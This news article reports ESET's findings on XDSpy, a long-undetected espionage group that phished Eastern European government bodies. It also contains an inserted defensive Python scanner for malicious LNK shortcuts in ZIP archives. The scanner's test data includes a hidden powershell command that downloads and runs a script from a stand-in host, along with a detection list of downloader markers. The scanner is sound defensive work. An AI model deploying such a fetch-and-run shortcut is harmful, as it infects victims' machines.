Hackers attacked Eastern European government institutions five days a week for nine years, but went unnoticed

Wednesday, October 7, 2020 – 11:50 GMT

The hacker group XDSpy, which has been attacking government institutions in Eastern Europe for several years, has been identified. Quite possibly, its operators are located in roughly the same region as their victims.

Have you spotted a spy?

ESET researchers have published a report on the cyber-espionage group XDSpy, which targets Eastern European countries. The group somehow managed to stay unseen for nine years.

Since all of the attacks it carried out used the same component, called XDDown, an executable that downloads the other malicious modules, the group was dubbed XDSpy. Its victims, found in Russia, Belarus, Moldova, Serbia and Ukraine, are primarily government departments and military organizations, although a number of private businesses have also been hit.

Prior to ESET's analysis, the Belarusian Cyber Threat Response Center CERT.BY had published a brief report on the distribution of malicious software to more than a hundred recipients: government officials (including staff of several ministries), private individuals and representatives of various organizations.

CERT.BY staff managed to identify one of the control servers used in the attacks; ESET researchers have since listed it among XDSpy's C&C servers.

The cyber espionage campaign went unnoticed for nine years

After examining the malicious code used in the attacks, the network infrastructure and the choice of victims, ESET researchers concluded that XDSpy's activity does not overlap with that of any known APT group.

The attackers presumably work in the UTC+2 or UTC+3 time zone, i.e. in roughly the same region where their victims are located. "We have found that they work from Monday to Friday, which suggests a professional occupation," the ESET study says.

Phishing, once again

The infection chain starts with spear-phishing emails (that is, very narrowly targeted ones) that either carry a ZIP or RAR archive or contain a link to an external site from which the recipient is invited to download it. The archive contains an LNK file which, when opened, runs a script that downloads XDDown to the victim's machine. XDDown then fetches additional modules from one of the control servers.
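The delivery step described above (an archive whose only executable content is a shortcut file that launches a script) can be checked for at the mail gateway or in triage. The following is an added example, not code from the ESET report or from this article: it parses the MS-SHLLINK string data of every shortcut found inside a ZIP attachment and flags shortcuts whose target or arguments mention a script host or a download primitive. The marker list is a generic heuristic assumed here (the article does not say which interpreter XDSpy's LNK invoked), the `build_lnk` helper only exists to construct test data, and the sample archive and URL are constructed.

```python
import io
import struct
import zipfile

# Header constants from MS-SHLLINK: HeaderSize 0x4C and the shell link CLSID
# 00021401-0000-0000-C000-000000000046 in its on-disk (little-endian) layout.
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_REL_PATH, HAS_WORK_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = (
    0x04, 0x08, 0x10, 0x20, 0x40, 0x80)
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"),
                 (HAS_WORK_DIR, "working_dir"), (HAS_ARGS, "arguments"),
                 (HAS_ICON, "icon_location"))
# Assumed heuristic: substrings that indicate a script host or downloader.
SCRIPT_AND_DOWNLOAD_MARKERS = (
    "powershell", "pwsh", "cmd.exe", "wscript", "cscript", "mshta",
    "rundll32", "regsvr32", "certutil", "bitsadmin", "downloadstring",
    "downloadfile", "invoke-webrequest", "http://", "https://")


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields (target path, arguments, ...) of a shell link,
    skipping the optional LinkTargetIDList and LinkInfo blocks that precede them."""
    if (len(data) < LNK_HEADER_SIZE
            or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a shell link")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = LNK_HEADER_SIZE
    if flags & HAS_ID_LIST:                       # IDListSize is a 2-byte prefix
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                     # LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for flag, name in STRING_FIELDS:              # fixed order per the spec
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        if flags & IS_UNICODE:
            fields[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[name] = data[pos:pos + count].decode("cp1252", "replace")
            pos += count
    return fields


def scan_archive(zip_bytes: bytes) -> list:
    """List every shell link in a ZIP (detected by header, not by file name, so
    'Document.pdf.lnk' style names do not matter) with the markers it matched."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            data = zf.read(info.filename)
            try:
                fields = parse_lnk(data)
            except ValueError:
                continue
            haystack = " ".join(fields.values()).lower()
            matches = [m for m in SCRIPT_AND_DOWNLOAD_MARKERS if m in haystack]
            findings.append({"member": info.filename, "fields": fields,
                             "matches": matches, "suspicious": bool(matches)})
    return findings


def build_lnk(arguments: str = "", relative_path: str = "") -> bytes:
    """Construct a minimal Unicode shell link for the demo (test data only; real
    LNK files also carry an IDList, LinkInfo, timestamps and attributes)."""
    flags, body = IS_UNICODE, b""
    if relative_path:
        flags |= HAS_REL_PATH
        body += struct.pack("<H", len(relative_path)) + relative_path.encode("utf-16-le")
    if arguments:
        flags |= HAS_ARGS
        body += struct.pack("<H", len(arguments)) + arguments.encode("utf-16-le")
    header = struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID + struct.pack("<I", flags)
    return header + b"\0" * (LNK_HEADER_SIZE - len(header)) + body


def sample_archive() -> bytes:
    """Constructed sample: a decoy text file, a shortcut that launches a script
    host to fetch a payload, and a harmless shortcut to a local file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Notes.txt", "see the attached document")
        zf.writestr("Document.pdf.lnk", build_lnk(
            arguments='/c "powershell -w hidden -c IEX(New-Object Net.WebClient)'
                      '.DownloadString(\'http://example.invalid/s.ps1\')"',
            relative_path=r"..\..\Windows\System32\cmd.exe"))
        zf.writestr("Readme.lnk", build_lnk(relative_path=r".\Readme.txt"))
    return buf.getvalue()


if __name__ == "__main__":
    for f in scan_archive(sample_archive()):
        print(f["member"], "SUSPICIOUS" if f["suspicious"] else "ok", f["matches"])
```

Only ZIP is handled here because the standard library has no RAR reader; the same `parse_lnk` can be applied to members extracted by any other archive tool. The heuristic is deliberately loose (a shortcut to `cmd.exe` is enough to flag), which is the right trade-off for a narrowly targeted campaign, where a shortcut inside an emailed archive is itself unusual.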

"The fact that XDSpy has stayed unnoticed for such a long time can already be considered unusual today," says Mikhail Zaitsev, an information security specialist at SEC Consult Services. "This is most likely due to the fact that its operators predominantly (or exclusively) used their own tools rather than anyone else's code. It is also possible that by starting to take part in mass mailings of malware they eventually gave themselves away. The more narrowly targeted the threats, the less likely they are to be detected."